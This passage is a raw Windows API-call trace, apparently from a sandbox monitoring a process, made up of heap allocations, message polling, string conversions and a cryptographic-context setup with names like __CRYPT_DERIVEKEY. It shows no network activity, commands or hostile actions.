wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0243.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0243.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041f8 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.251] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041f8 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0243.251] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0243.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0243.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0243.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0243.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0243.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0243.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0243.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0243.253] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0243.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.254] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0243.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f044d0 | out: hHeap=0x970000) returned 1 [0243.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0243.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0243.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0243.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04188 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.257] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0243.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.257] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0243.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.257] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.258] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.258] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0243.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0243.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.258] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.259] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0243.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0243.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0243.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041f8 | out: hHeap=0x970000) returned 1 [0243.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.260] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0243.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0243.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0243.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040a8 | out: hHeap=0x970000) returned 1 [0243.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.260] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0243.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0243.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0243.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0243.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0243.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.264] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0243.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0243.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0243.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0243.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0243.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0243.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0243.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0243.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0243.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0243.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0243.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0243.312] RtlAllocateHeap 